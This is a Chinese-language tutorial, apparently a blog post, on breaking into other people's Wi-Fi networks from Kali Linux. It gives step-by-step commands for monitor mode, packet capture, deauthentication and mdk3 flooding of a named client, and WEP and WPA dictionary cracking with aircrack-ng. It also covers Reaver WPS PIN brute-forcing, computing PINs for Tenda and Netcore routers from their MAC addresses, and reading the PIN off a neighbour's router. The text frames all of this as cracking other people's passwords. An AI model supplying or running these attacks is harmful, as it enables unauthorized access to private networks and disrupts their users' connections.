Wifi密码破解
Wifi密码破解1:通过字典(暴力)破解WIFI密码
简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux
工具:Aircrack-ng
过程很简单:先抓含有正确密码的握手包(客户端连接wifi的时候会互相交换报文),然后从这个抓到的握手包里找到wifi密码;如果是wep加密的,报文足够多的话可以直接通过算法算出密码,因为wep的加密算法比较弱;如果是wpa/wpa2,直接算是不可能出密码的,所以我们准备足够强大的密码字典,通过算法比对握手包里的密码和密码字典,从而试出密码...
首先试一试wep加密的wifi:
如果无线网卡没有正常工作,输入airmon-ng wlan0 up加载无线网卡;之后输入airmon-ng start wlan0激活网卡到监听模式monitor(如下图):
之后输入airodump-ng mon0进行探测我们要攻击的目标主机(下图),这里以采用wep加密的essid为xiao106347的无线网路为目标,此时可以看到目标主机的mac地址为A8:15:4D:0F:C5:E8,有一个连接的客户端mac地址为B0:AA:36:18:E5:E5,信道CH为6!
按crtl+z停止当前探测。
继续输入airodump-ng --ivs -w abc -c 6 mon0 开始抓包!
#--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。
然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0
本例中的为 aireplay-ng -0 10 -a A8:15:4D:0F:C5:E8 -c B0:AA:36:18:E5:E5 mon0
接下来最好还是再开一个终端窗口,输入aircrack-ng abc-01.ivs,然后输入要破解的无线网络序号开始破解密码!
如下图,可以看到抓取到序号为1的xiao106347无线网络的报文有18465之多,一般等到这个数值大于2w就可以直接出密码了,也可以在破解的过程中等待数值的增大!
破解过程中可能会出现报文少而等待增加报文的情况,等待吧,达到要求它会继续开始破解的;如果deauth攻击的效果不是很明显,可以使用mdk3工具对目标进行洪水验证攻击,效果不错:
mdk3 mon0 a -a 目标主机mac
密码比较简单的话一般2500ivs就可以出密码了;这里继续开始!
经过2分多钟之后,无线密码被成功破解!
整个过程不超过10分钟,在上面的破解过程的,笔者为了更快抓包,一直是在用手机联网看高清电影的,数据交换比较大;但实际生活中可能木有这么简单,因为我们不确定在我们破解人家密码是的时候是否会有大量数据交换或有客户端连接。
wpa/wpa2加密的无线网络:
破解wpa/wpa2加密的wifi密码,步骤和上面区别不大,只是在最后一步破解密码时可能需要有一个强大的密码字典,效果要好一些;通过字典破解密码的命令为aircrack-ng -w 字典名称 ivs/cap文件,
例如aircrack-ng -w passwd.txt abc.cap/abc.ivs。
此时就是考验机器性能是否强悍,字典字典是否强大,运气是否比较好!
关于密码,linux平台可以使用字典生成软件crunch,点此查看使用方法!
效果图(这里为了快速得出结果,我将无线密码添加到字典里了,实际破解中一般是不会这么简单的,但步骤过程是不变的):
以上命令用法只是其中一部分,更多更灵活的命令可以通过 --help查看!
清晰版视频下载地址:
http://pan.baidu.com/s/1jGDTDOU
超清视频在线观看:
http://v.youku.com/v_show/id_XNzI0NDE4MDI4.html
Wifi密码破解2:利用wps漏洞穷举PIN码破解wifi密码
得到PIN码,怎么破解路由的密码呢?Linux系统下我们可以使用 Reaver 软件破解出路由的密码;下图是通过路由器的PIN码得到wifi密码的效果图:
已知PIN码是 49312119
破解出密码是 #$%19283746
和暴力破解密码相比,利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件,而且就算wifi主人修改密码,只要不更换pin码,也可以很快再次得到密码,但是必须要路由支持并开启WPS功能;如何得到路由的PIN 码呢?
1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令:
reaver -i mon0 -b mac -S -v -n
reaver命令参数(转):
- -i 监听后接口名称
- -b 目标mac地址
- -a 自动检测目标AP最佳配置
- -S 使用最小的DH key(可以提高PJ速度)
- -vv 显示更多的非严重警告
- -d 即delay每穷举一次的闲置时间 预设为1秒
- -t 即timeout每次穷举等待反馈的最长时间
- -c 指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9 参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
一个穷举过程:
在穷举的过程种reaver会生成以路由mac地址为名的wpc文件,一时半会pin不出来,第二天pin的时候命令加参数 -s file.wpc继续pin;或者多开几个终端窗口每个窗口都从不同的数字段开始pin,这样提高效率但也容易漏pin,比如 reaver -i mon0 -b mac -S -v -n -p 9000(窗口1) reaver -i mon0 -b mac -S -v -n -p 8000 (窗口2)
。。。。。。最后得到pin码和psk码(也就是密码),如果以后人家修给密码,只要不关闭wps功能就可以用reaver -i mon0 -b mac -p xxxxxxxx来再次得到密码。
一段时间过后,穷举出密码:
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
判断一个wifi信号是否开启了wps可以被探测出pin码,可以用airodump-ng命令或wash命令检测:
1).airodump-ng:MB项的那个54e.和54e,是54e.的就可以探测pin
2).wash -i mon0 -C:wps locked的那个项,YES的就可以被探测pin
利用wps漏洞破解wifi密码的软件还有wifite,bully等(具体看日志末尾的推荐阅读).
2.特殊路由的pin码可以通过计算得出
有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以"C83A35"或"00B00C"打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
当然还有腾达路由pin码计算器软件:
3.当然也可以假装干其他事,去人家看一下路由底部的pin码什么的。。。